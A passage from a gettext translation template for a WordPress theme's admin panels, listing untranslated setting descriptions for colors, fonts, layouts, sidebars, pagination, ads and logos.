backend/panels/block-grid.php:673 backend/panels/block-grid.php:860 #: backend/panels/block-list.php:525 backend/panels/block-list.php:720 msgid "Select a color for the background or border style." msgstr "" #: backend/panels/color.php:141 msgid "Select a color for the breadcrumb bar." msgstr "" #: backend/panels/single-post.php:254 msgid "Select a color for the hyperlink underline in the dark mode." msgstr "" #: backend/panels/single-post.php:246 msgid "" "Select a color for the hyperlink underline. Leave blank to set as the global " "color." msgstr "" #: backend/panels/color.php:95 msgid "" "Select a color for the light mode icon (Sun icon) of the dark mode switcher " "button to fit with the main navigation color." msgstr "" #: backend/panels/login.php:80 msgid "Select a color for the login screen." msgstr "" #: backend/panels/ads.php:521 msgid "" "Select a color for the slide up toggle button when activated in the dark " "mode." msgstr "" #: backend/panels/ads.php:513 msgid "Select a color for the slide up toggle button when activated." msgstr "" #: backend/panels/ads.php:529 msgid "Select a color for the slide up toggle button when not activated." msgstr "" #: backend/panels/privacy.php:65 msgid "Select a color for the text in the dark mode." msgstr "" #: backend/panels/privacy.php:49 msgid "Select a color for the text." msgstr "" #: backend/panels/privacy.php:57 msgid "Select a color for this box background in the dark mode." msgstr "" #: backend/panels/privacy.php:41 msgid "Select a color for this box background." msgstr "" #: backend/panels/socials.php:199 backend/panels/socials.php:226 #: backend/panels/socials.php:253 msgid "Select a color for this social icon." msgstr "" #: backend/panels/single-post.php:227 msgid "Select a color value for post hyperlinks in the dark mode." msgstr "" #: backend/panels/single-post.php:219 msgid "Select a color value for post hyperlinks." msgstr "" #: backend/panels/design.php:516 msgid "" "Select a color value for the audio icon. This setting will not apply to " "bottom right layout." msgstr "" #: backend/panels/design.php:508 msgid "" "Select a color value for the gallery icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/single-post.php:235 msgid "Select a color value for the post hyperlinks." msgstr "" #: backend/panels/woocommerce.php:197 msgid "Select a color value for the product price in the dark mode." msgstr "" #: backend/panels/woocommerce.php:189 msgid "Select a color value for the product price." msgstr "" #: backend/panels/color.php:133 msgid "Select a color value for the star icons." msgstr "" #: backend/panels/woocommerce.php:213 msgid "Select a color value for the stars review in the dark mode." msgstr "" #: backend/panels/woocommerce.php:205 msgid "Select a color value for the stars review." msgstr "" #: backend/panels/design.php:499 msgid "" "Select a color value for the video icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/newsletter.php:72 msgid "Select a cover image for the box." msgstr "" #: backend/single-metaboxes.php:244 msgid "" "Select a crop size for the featured image in case you would like to control " "the size." msgstr "" #: backend/category-settings.php:329 msgid "" "Select a crop size for the featured image to displaying in this category." msgstr "" #: backend/panels/woocommerce.php:254 msgid "Select a custom font for the product price." msgstr "" #: backend/panels/woocommerce.php:238 msgid "Select a custom font for the product title." msgstr "" #: backend/panels/ads.php:131 backend/panels/ads.php:320 msgid "Select a custom size for this ad if you use adsense ad units." msgstr "" #: backend/panels/color.php:58 msgid "" "Select a dark accent color for your website, This setting apply to single " "header background, gradient colors." msgstr "" #: backend/panels/color.php:87 msgid "" "Select a dark solid background for the dark mode. Leave blank to set it as " "the default." msgstr "" #: backend/panels/single-post.php:1188 msgid "Select a default featured image for the review box." msgstr "" #: backend/panels/heading.php:41 msgid "" "Select a default heading layout for the archives and Elementor blocks for " "your website." msgstr "" #: backend/panels/single-post.php:45 msgid "Select a default layout for the single post pages." msgstr "" #: backend/panels/single-post.php:1165 msgid "Select a default review type for your website." msgstr "" #: backend/panels/design.php:443 msgid "" "Select a effect for the sliders. This setting will be not available for the " "carousel mode." msgstr "" #: backend/panels/design.php:266 msgid "" "Select a fallback meta for displaying when if the post does not have custom " "meta value." msgstr "" #: backend/panels/block-classic.php:32 backend/panels/block-grid.php:32 #: backend/panels/block-grid.php:197 backend/panels/block-grid.php:362 #: backend/panels/block-grid.php:535 backend/panels/block-grid.php:722 #: backend/panels/block-list.php:32 backend/panels/block-list.php:205 #: backend/panels/block-list.php:386 backend/panels/block-list.php:581 #: backend/panels/blog-pages.php:350 backend/panels/blog-pages.php:837 #: backend/panels/blog-pages.php:1251 backend/panels/blog-pages.php:1659 #: backend/panels/blog-pages.php:2151 backend/panels/bookmark.php:250 #: backend/panels/bookmark.php:698 msgid "Select a featured image size to optimize with the columns setting." msgstr "" #: backend/panels/typography.php:654 backend/panels/typography.php:1129 msgid "" "Select a font size (px) for buttons on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:661 backend/panels/typography.php:1136 msgid "" "Select a font size (px) for buttons on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:508 msgid "" "Select a font size (px) for entry meta info on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:515 msgid "" "Select a font size (px) for entry meta info on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:611 msgid "" "Select a font size (px) for input and textarea on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:618 msgid "" "Select a font size (px) for input and textarea on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:60 msgid "" "Select a font size (px) for the body on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:53 msgid "" "Select a font size (px) for the body on the mobile device (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:871 msgid "" "Select a font size (px) for the breadcrumbs bar on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:878 msgid "" "Select a font size (px) for the breadcrumbs bar on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:442 msgid "" "Select a font size (px) for the entry category element on mobile devices " "(max screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:449 msgid "" "Select a font size (px) for the entry category element on tablet devices " "(max screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:99 msgid "" "Select a font size (px) for the excerpt on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:106 msgid "" "Select a font size (px) for the excerpt on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:92 msgid "" "Select a font size (px) for the excerpt. Leave this option blank to set the " "default value." msgstr "" #: backend/panels/typography.php:1057 msgid "" "Select a font size (px) for the heading block on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1064 msgid "" "Select a font size (px) for the heading block on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/category-settings.php:442 backend/panels/blog-pages.php:469 #: backend/panels/blog-pages.php:956 backend/panels/blog-pages.php:1370 #: backend/panels/blog-pages.php:1778 backend/panels/blog-pages.php:2270 #: backend/panels/bookmark.php:368 backend/panels/bookmark.php:816 msgid "" "Select a font size (px) for the post title in the desktop device. Leave " "blank to set it as the default." msgstr "" #: backend/category-settings.php:458 backend/panels/blog-pages.php:483 #: backend/panels/blog-pages.php:970 backend/panels/blog-pages.php:1384 #: backend/panels/blog-pages.php:1792 backend/panels/blog-pages.php:2284 #: backend/panels/bookmark.php:382 backend/panels/bookmark.php:830 msgid "" "Select a font size (px) for the post title in the mobile device. Leave blank " "to set it as the default." msgstr "" #: backend/category-settings.php:450 backend/panels/blog-pages.php:476 #: backend/panels/blog-pages.php:963 backend/panels/blog-pages.php:1377 #: backend/panels/blog-pages.php:1785 backend/panels/blog-pages.php:2277 #: backend/panels/bookmark.php:375 backend/panels/bookmark.php:823 msgid "" "Select a font size (px) for the post title in the table devices. Leave blank " "to set it as the default." msgstr "" #: backend/panels/typography.php:556 msgid "" "Select a font size (px) for the readmore button on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:563 msgid "" "Select a font size (px) for the readmore button on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:730 msgid "" "Select a font size (px) for the single headline on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:737 msgid "" "Select a font size (px) for the single headline on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:723 #, php-format msgid "" "Select a font size (px) for the single headline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:787 msgid "" "Select a font size (px) for the single tagline on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:794 msgid "" "Select a font size (px) for the single tagline on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:780 #, php-format msgid "" "Select a font size (px) for the single tagline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:148 backend/panels/typography.php:197 #: backend/panels/typography.php:246 backend/panels/typography.php:295 #: backend/panels/typography.php:344 backend/panels/typography.php:393 msgid "" "Select a font size (px) for this heading tag on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:155 backend/panels/typography.php:204 #: backend/panels/typography.php:253 backend/panels/typography.php:302 #: backend/panels/typography.php:351 backend/panels/typography.php:400 msgid "" "Select a font size (px) for this heading tag on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/single-post.php:206 msgid "Select a font style for the post hyperlinks." msgstr "" #: backend/panels/header.php:150 backend/panels/header.php:382 msgid "Select a footer menu to display at the bottom of this section." msgstr "" #: backend/single-metaboxes.php:425 msgid "" "Select a gallery layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/color.php:37 msgid "Select a global color in the dark mode." msgstr "" #: backend/panels/color.php:29 msgid "" "Select a global color, This setting apply to all links, menu, category " "overlays, main page and many contrasting elements." msgstr "" #: backend/panels/single-post.php:104 msgid "Select a global layout for the audio post format." msgstr "" #: backend/panels/single-post.php:133 msgid "Select a global layout for the gallery post format." msgstr "" #: backend/panels/single-post.php:67 msgid "Select a global layout for the video post format." msgstr "" #: backend/panels/page.php:31 msgid "Select a header style for the single page." msgstr "" #: backend/category-settings.php:57 msgid "Select a header style for this category." msgstr "" #: backend/panels/heading.php:105 msgid "Select a heading layout for the footer column widgets." msgstr "" #: backend/category-settings.php:190 backend/panels/blog-pages.php:212 #: backend/panels/bookmark.php:525 backend/panels/single-post.php:1312 msgid "Select a heading layout for the heading." msgstr "" #: backend/panels/heading.php:96 msgid "Select a heading layout for the sidebar widgets." msgstr "" #: backend/category-settings.php:31 backend/panels/design.php:45 msgid "" "Select a highlight color for the entry category to display in the post " "listing." msgstr "" #: backend/panels/single-post.php:516 msgid "Select a HTML tag for the single tagline to optimize your SEO settings." msgstr "" #: backend/panels/single-post.php:530 msgid "Select a HTML tag for the single tagline." msgstr "" #: backend/panels/bookmark.php:533 backend/panels/single-post.php:1320 msgid "Select a HTML tag for this heading." msgstr "" #: backend/category-settings.php:198 backend/panels/blog-pages.php:220 msgid "" "Select a HTML tag for this heading. Leave this option blank to set the " "default." msgstr "" #: backend/single-metaboxes.php:220 msgid "Select a HTML tag for this tagline." msgstr "" #: backend/panels/single-post.php:1337 msgid "Select a layout for the blog listing." msgstr "" #: backend/panels/block-classic.php:40 backend/panels/block-grid.php:40 #: backend/panels/block-grid.php:205 backend/panels/block-grid.php:370 #: backend/panels/block-grid.php:543 backend/panels/block-grid.php:730 #: backend/panels/block-list.php:48 backend/panels/block-list.php:221 #: backend/panels/block-list.php:402 backend/panels/block-list.php:597 #: backend/panels/blog-pages.php:365 backend/panels/blog-pages.php:852 #: backend/panels/blog-pages.php:1266 backend/panels/blog-pages.php:1674 #: backend/panels/blog-pages.php:2166 backend/panels/bookmark.php:265 #: backend/panels/bookmark.php:713 msgid "Select a layout for the entry category to display in the post listing." msgstr "" #: backend/panels/footer.php:91 msgid "Select a layout for the footer widget area." msgstr "" #: backend/panels/header.php:341 msgid "Select a layout for the mobile header." msgstr "" #: backend/panels/header.php:548 msgid "Select a layout for the sign in trigger button." msgstr "" #: backend/single-metaboxes.php:723 msgid "Select a layout for the table of contents of this post." msgstr "" #: backend/panels/table-contents.php:111 msgid "Select a layout for the table of contents." msgstr "" #: backend/panels/page.php:43 backend/panels/single-post.php:183 #: backend/single-metaboxes.php:70 msgid "Select a max-width for the content area without sidebar." msgstr "" #: backend/panels/footer.php:200 msgid "Select a menu to display in the footer copyright bar." msgstr "" #: backend/panels/newsletter.php:94 msgid "Select a mode to display the newsletter popup." msgstr "" #: backend/panels/single-post.php:1368 msgid "Select a pagination type for the related section." msgstr "" #: backend/panels/block-list.php:40 backend/panels/block-list.php:213 #: backend/panels/block-list.php:394 backend/panels/block-list.php:589 msgid "Select a position for the featured image. " msgstr "" #: backend/panels/login.php:37 msgid "Select a position for the login form." msgstr "" #: backend/single-metaboxes.php:89 msgid "" "Select a position for the sidebar of this page. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:448 msgid "" "Select a position for the sidebar of this post. It will override on the " "default settings in the Theme Options panel." msgstr "" #: backend/panels/single-post.php:442 msgid "" "Select a position for the single sidebar. You can set an individual sidebar " "position for each post in the post editor page." msgstr "" #: backend/panels/privacy.php:22 msgid "Select a position to display the privacy box." msgstr "" #: backend/single-metaboxes.php:275 msgid "Select a Primary Category for this post." msgstr "" #: backend/panels/heading.php:67 backend/panels/heading.php:152 msgid "Select a primary color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:50 backend/panels/heading.php:135 msgid "Select a primary color for the heading." msgstr "" #: backend/panels/woocommerce.php:117 msgid "" "Select a sidebar for product category and archive pages if you enabled the " "sidebar." msgstr "" #: backend/panels/woocommerce.php:88 msgid "Select a sidebar for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:109 msgid "" "Select a sidebar position for product category and archive pages if you " "enabled the sidebar." msgstr "" #: backend/panels/blog-pages.php:306 backend/panels/blog-pages.php:793 #: backend/panels/blog-pages.php:1207 backend/panels/blog-pages.php:1615 #: backend/panels/bookmark.php:209 msgid "Select a sidebar position or disable it for the latest blog section" msgstr "" #: backend/category-settings.php:296 msgid "Select a sidebar position or disable it for the latest blog section." msgstr "" #: backend/panels/blog-pages.php:2107 msgid "Select a sidebar position or disable it for the search result listing." msgstr "" #: backend/panels/page.php:67 msgid "Select a sidebar position or disable it for the single page." msgstr "" #: backend/panels/bookmark.php:657 msgid "Select a sidebar position or disable it for this section." msgstr "" #: backend/panels/single-post.php:1556 msgid "Select a site header style for the single post." msgstr "" #: backend/single-metaboxes.php:114 msgid "Select a site header style for this page" msgstr "" #: backend/single-metaboxes.php:891 msgid "Select a site header style for this post." msgstr "" #: backend/panels/amp.php:329 backend/panels/amp.php:389 #: backend/panels/amp.php:449 backend/panels/amp.php:510 #: backend/panels/amp.php:570 msgid "Select a size for this ad." msgstr "" #: backend/panels/ads.php:142 backend/panels/ads.php:331 msgid "Select a size on the desktop device." msgstr "" #: backend/panels/ads.php:158 backend/panels/ads.php:347 msgid "Select a size on the mobile device." msgstr "" #: backend/panels/ads.php:150 backend/panels/ads.php:339 msgid "Select a size on the tablet device." msgstr "" #: backend/category-settings.php:283 msgid "Select a spacing between columns for the blog listing layout." msgstr "" #: backend/panels/blog-pages.php:283 backend/panels/blog-pages.php:770 #: backend/panels/blog-pages.php:1184 backend/panels/blog-pages.php:1592 #: backend/panels/blog-pages.php:2084 backend/panels/bookmark.php:187 #: backend/panels/bookmark.php:627 backend/panels/bookmark.php:635 msgid "Select a spacing between columns." msgstr "" #: backend/single-metaboxes.php:305 msgid "" "Select a standard layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/header-style.php:239 backend/panels/header-style.php:528 #: backend/panels/header-style.php:794 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header in the dark mode." msgstr "" #: backend/panels/header-style.php:161 backend/panels/header-style.php:450 #: backend/panels/header-style.php:716 msgid "" "Select a text color for displaying in sub menus and other dropdown sections " "of this header." msgstr "" #: backend/panels/header-style.php:269 msgid "" "Select a text color for displaying in the navigation bar of the transparent " "header." msgstr "" #: backend/panels/header-style.php:203 backend/panels/header-style.php:492 #: backend/panels/header-style.php:758 msgid "" "Select a text color for displaying in the navigation bar of this header in " "the dark mode." msgstr "" #: backend/panels/header-style.php:125 backend/panels/header-style.php:413 #: backend/panels/header-style.php:680 msgid "" "Select a text color for displaying in the navigation bar of this header." msgstr "" #: backend/panels/header.php:494 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:441 msgid "" "Select a text color for menu item, sub menu item and other elements for " "displaying in the collapse section." msgstr "" #: backend/category-settings.php:45 backend/panels/design.php:61 msgid "" "Select a text color for the entry category to display in the post listing in " "the dark mode." msgstr "" #: backend/category-settings.php:38 backend/panels/design.php:53 msgid "" "Select a text color for the entry category to display in the post listing. " "Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:474 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header in the dark mode." msgstr "" #: backend/panels/header.php:421 msgid "" "Select a text color for toggle button, search, quick view menu for " "displaying on the mobile header." msgstr "" #: backend/panels/footer.php:62 msgid "Select a text color scheme for the footer." msgstr "" #: backend/panels/header.php:285 msgid "Select a text color scheme to fit with the sub menu background." msgstr "" #: backend/panels/header-style.php:211 backend/panels/header-style.php:247 #: backend/panels/header-style.php:500 backend/panels/header-style.php:536 #: backend/panels/header-style.php:766 backend/panels/header-style.php:802 msgid "Select a text color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:133 backend/panels/header-style.php:169 #: backend/panels/header-style.php:277 backend/panels/header-style.php:421 #: backend/panels/header-style.php:458 backend/panels/header-style.php:688 #: backend/panels/header-style.php:724 msgid "Select a text color when hovering." msgstr "" #: backend/category-settings.php:434 backend/panels/block-classic.php:121 #: backend/panels/block-grid.php:121 backend/panels/block-grid.php:286 #: backend/panels/block-grid.php:451 backend/panels/block-grid.php:624 #: backend/panels/block-grid.php:811 backend/panels/block-list.php:129 #: backend/panels/block-list.php:302 backend/panels/block-list.php:483 #: backend/panels/block-list.php:678 backend/panels/blog-pages.php:461 #: backend/panels/blog-pages.php:948 backend/panels/blog-pages.php:1362 #: backend/panels/blog-pages.php:1770 backend/panels/blog-pages.php:2262 #: backend/panels/bookmark.php:360 backend/panels/bookmark.php:808 msgid "Select a title HTML tag for the post title." msgstr "" #: backend/panels/heading.php:113 msgid "Select a title HTML tag for the sidebar widget heading." msgstr "" #: backend/panels/ads.php:238 msgid "Select a top and bottom spacing for the advert." msgstr "" #: backend/single-metaboxes.php:57 msgid "" "Select a top header style for this page. This option is used for the single " "page (not Elementor page)." msgstr "" #: backend/single-metaboxes.php:504 msgid "Select a type of review for this post." msgstr "" #: backend/single-metaboxes.php:323 msgid "" "Select a video layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:604 msgid "Select a website header style for the blog page." msgstr "" #: backend/panels/blog-pages.php:38 msgid "Select a website header style for the category pages." msgstr "" #: backend/panels/blog-pages.php:1922 msgid "Select a website header style for the search page." msgstr "" #: backend/panels/header-style.php:57 backend/panels/header-style.php:351 #: backend/panels/header-style.php:602 msgid "Select a width style for this header." msgstr "" #: backend/panels/ads.php:78 msgid "Select ad settings for displaying at the top of your website." msgstr "" #: backend/panels/ads.php:266 msgid "Select ad settings for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:16 msgid "Select ad settings for your website." msgstr "" #: backend/panels/header.php:699 msgid "Select background color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:683 msgid "Select background color for the bar." msgstr "" #: backend/panels/blog-pages.php:1560 msgid "Select blog listing layout for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1152 msgid "Select blog listing layout for the author pages." msgstr "" #: backend/panels/blog-pages.php:738 msgid "Select blog listing layout for the blog." msgstr "" #: backend/panels/blog-pages.php:251 msgid "Select blog listing layout for the category pages." msgstr "" #: backend/panels/bookmark.php:155 msgid "Select blog listing layout for the saved pages." msgstr "" #: backend/panels/blog-pages.php:2052 msgid "Select blog listing layout for the search result listing." msgstr "" #: backend/category-settings.php:239 msgid "Select blog listing layout for this category." msgstr "" #: backend/panels/bookmark.php:595 msgid "Select blog listing layout for this section." msgstr "" #: backend/panels/color.php:16 msgid "" "Select colors for your website. To organize the panel and make it easy to " "use, you may also see color settings for each elements in it's panel." msgstr "" #: backend/panels/header.php:127 msgid "Select columns per row for this section." msgstr "" #: backend/panels/color.php:66 msgid "Select dark accent color in the dark mode." msgstr "" #: backend/panels/block-classic.php:148 backend/panels/block-grid.php:148 #: backend/panels/block-grid.php:313 backend/panels/block-grid.php:478 #: backend/panels/block-grid.php:651 backend/panels/block-grid.php:838 #: backend/panels/block-list.php:156 backend/panels/block-list.php:329 #: backend/panels/block-list.php:510 backend/panels/block-list.php:705 msgid "" "Select entry meta tags you would like to hide on the mobile devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/block-classic.php:139 backend/panels/block-grid.php:139 #: backend/panels/block-grid.php:304 backend/panels/block-grid.php:469 #: backend/panels/block-grid.php:642 backend/panels/block-grid.php:829 #: backend/panels/block-list.php:147 backend/panels/block-list.php:320 #: backend/panels/block-list.php:501 backend/panels/block-list.php:696 msgid "" "Select entry meta tags you would like to hide on the tablet devices. In case " "long meta it would be useful." msgstr "" #: backend/panels/bookmark.php:404 msgid "" "Select entry meta you would like to hide on the mobile devices. In case long " "meta it would be useful." msgstr "" #: backend/panels/typography.php:999 msgid "" "Select font for mobile quick access menu items for displaying in the mobile " "device." msgstr "" #: backend/panels/typography.php:925 msgid "Select font for sub-level menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:970 msgid "Select font for sub-level menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:1112 msgid "Select font for the default archives, categories and menu fonts." msgstr "" #: backend/panels/typography.php:424 msgid "Select font for the entry category element." msgstr "" #: backend/panels/typography.php:124 msgid "" "Select font for the H1 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:173 msgid "" "Select font for the H2 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:222 msgid "" "Select font for the H3 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:271 msgid "" "Select font for the H4 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:320 msgid "" "Select font for the H5 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:369 msgid "" "Select font for the H6 tag. Selecting same font family settings for similar " "elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:581 msgid "" "Select font for the input, textarea and button. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:909 msgid "Select font for top menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:954 msgid "Select font for top menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:78 msgid "Select font sizes for the excerpt in the post listing." msgstr "" #: backend/panels/typography.php:473 msgid "" "Select font values for entry meta info: date, view, comment... Those options " "will not apply to the author meta." msgstr "" #: backend/panels/typography.php:896 msgid "Select font values for menus on the website header." msgstr "" #: backend/panels/typography.php:686 msgid "" "Select font values for Single Headline (Single Post Title) and Single " "Tagline (Single Sub Title)." msgstr "" #: backend/panels/typography.php:489 msgid "" "Select font values for the author, category meta, review description and " "sponsored brand." msgstr "" #: backend/panels/typography.php:1033 msgid "Select font values for the block heading." msgstr "" #: backend/panels/typography.php:813 msgid "Select font values for the block quote." msgstr "" #: backend/panels/typography.php:848 msgid "" "Select font values for the breadcrumb bar. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:1099 msgid "" "Select font values for the default widgets, apply to the archive, category " "widgets..." msgstr "" #: backend/panels/typography.php:418 msgid "" "Select font values for the entry category (category icon) in the post " "listing." msgstr "" #: backend/panels/typography.php:130 msgid "Select font values for the H1 tag and [ CSS classname: .h1]" msgstr "" #: backend/panels/typography.php:179 msgid "Select font values for the H2 tag and [ CSS classname: .h2]" msgstr "" #: backend/panels/typography.php:228 msgid "Select font values for the H3 tag and [ CSS classname: .h3]" msgstr "" #: backend/panels/typography.php:277 msgid "Select font values for the H4 tag and [ CSS classname: .h4]" msgstr "" #: backend/panels/typography.php:326 msgid "Select font values for the H5 tag and [ CSS classname: .h5]" msgstr "" #: backend/panels/typography.php:375 msgid "Select font values for the H6 tag and [ CSS classname: .h6]" msgstr "" #: backend/panels/typography.php:467 msgid "" "Select font values for the post entry meta. Selecting same font family " "settings for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:539 msgid "Select font values for the read more button" msgstr "" #: backend/panels/typography.php:533 msgid "Select font values for the read more button." msgstr "" #: backend/panels/typography.php:705 msgid "" "Select font values for the single headline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:762 msgid "" "Select font values for the single tagline for displaying in the full width " "layouts." msgstr "" #: backend/panels/typography.php:30 msgid "" "Select font values for your website. The settings below apply to almost " "content elements on the website." msgstr "" #: backend/panels/bookmark.php:30 msgid "Select general settings for the bookmark system." msgstr "" #: backend/panels/design.php:569 msgid "Select hover effect settings for your website." msgstr "" #: backend/panels/single-post.php:30 msgid "Select layouts for the single post that based on the post formats." msgstr "" #: backend/category-settings.php:409 backend/panels/block-classic.php:91 #: backend/panels/block-grid.php:91 backend/panels/block-grid.php:256 #: backend/panels/block-grid.php:421 backend/panels/block-grid.php:594 #: backend/panels/block-grid.php:781 backend/panels/block-list.php:99 #: backend/panels/block-list.php:272 backend/panels/block-list.php:453 #: backend/panels/block-list.php:648 backend/panels/blog-pages.php:436 #: backend/panels/blog-pages.php:923 backend/panels/blog-pages.php:1337 #: backend/panels/blog-pages.php:1745 backend/panels/blog-pages.php:2237 #: backend/panels/bookmark.php:335 backend/panels/bookmark.php:783 msgid "select max length of the post excerpt." msgstr "" #: backend/panels/header.php:204 msgid "Select mode for the search button when clicking on." msgstr "" #: backend/single-metaboxes.php:130 msgid "Select navigation bar style for the header of this page." msgstr "" #: backend/single-metaboxes.php:907 msgid "Select navigation bar style for the header of this post." msgstr "" #: backend/panels/blog-pages.php:612 msgid "Select navigation bar style for the site header in the blog index page." msgstr "" #: backend/panels/blog-pages.php:46 msgid "Select navigation bar style for the site header in the category pages." msgstr "" #: backend/panels/blog-pages.php:1930 msgid "Select navigation bar style for the site header in the search page." msgstr "" #: backend/panels/header-style.php:69 backend/panels/header-style.php:614 msgid "Select navigation bar style for these header styles." msgstr "" #: backend/panels/single-post.php:1362 msgid "Select number of posts to show at once." msgstr "" #: backend/panels/woocommerce.php:72 msgid "" "Select number of products per page, leave blank if you want to set as " "Settings default." msgstr "" #: backend/panels/login.php:13 msgid "Select option for the login screen page." msgstr "" #: backend/panels/single-post.php:157 msgid "Select options for content area." msgstr "" #: backend/panels/single-post.php:1426 msgid "Select options for the ajax load next posts feature." msgstr "" #: backend/panels/header.php:115 msgid "" "Select options for the more menu and enable/disable it for each header style." msgstr "" #: backend/panels/privacy.php:8 msgid "Select options for the privacy notice bar." msgstr "" #: backend/panels/reaction.php:17 msgid "Select options for the reaction section." msgstr "" #: backend/panels/single-post.php:1251 msgid "" "Select options for the related and popular section at the footer of the " "single post page." msgstr "" #: backend/panels/single-post.php:1158 msgid "Select options for the review system." msgstr "" #: backend/panels/woocommerce.php:45 msgid "Select options for the shop and archive and single product pages." msgstr "" #: backend/panels/woocommerce.php:29 msgid "Select options for the shop." msgstr "" #: backend/panels/footer.php:16 msgid "" "Select options for your website footer. Navigate to Appearance > Widgets to " "add widgets to footer sections." msgstr "" #: backend/panels/header.php:17 msgid "Select options for your website header." msgstr "" #: backend/panels/optimized.php:15 msgid "Select options to optimize your website speed." msgstr "" #: backend/panels/logo.php:55 msgid "" "Select or upload a light logo for displaying in the dark mode. It should be " "same dimensions with the site logo." msgstr "" #: backend/panels/logo.php:71 msgid "" "Select or upload a light retina logo for displaying in the dark mode. It " "should be same dimensions with the retina site logo" msgstr "" #: backend/panels/logo.php:150 msgid "Select or upload bookmarklet icons for iOS and Android devices." msgstr "" #: backend/panels/logo.php:86 msgid "Select or upload logos for displaying in the mobile device." msgstr "" #: backend/panels/logo.php:116 msgid "Select or upload logos for displaying in the transparent headers." msgstr "" #: backend/panels/logo.php:63 msgid "" "Select or upload retina (2x) logo. Recommended logo height value is 120px, " "allowed extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:47 msgid "" "Select or upload site logo. Recommended logo height value is 60px, allowed " "extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/blog-pages.php:1857 msgid "Select pagination type for the archive pages." msgstr "" #: backend/panels/blog-pages.php:1449 msgid "Select pagination type for the author pages." msgstr "" #: backend/panels/blog-pages.php:1036 msgid "Select pagination type for the blog." msgstr "" #: backend/panels/blog-pages.php:548 msgid "Select pagination type for the category pages." msgstr "" #: backend/panels/blog-pages.php:2349 msgid "Select pagination type for the search result listing." msgstr "" #: backend/category-settings.php:226 msgid "Select pagination type for this category." msgstr "" #: backend/panels/bookmark.php:570 msgid "Select pagination type for this section." msgstr "" #: backend/panels/design.php:255 msgid "Select position for the custom meta label at the beginning or end." msgstr "" #: backend/panels/design.php:314 msgid "Select position to crop the featured image." msgstr "" #: backend/panels/blog-pages.php:1538 msgid "" "Select posts per page for the archives. Leave this option blank to set the " "default." msgstr "" #: backend/panels/blog-pages.php:1129 msgid "" "Select posts per page for the authors. Leave this option blank to set the " "default." msgstr "" 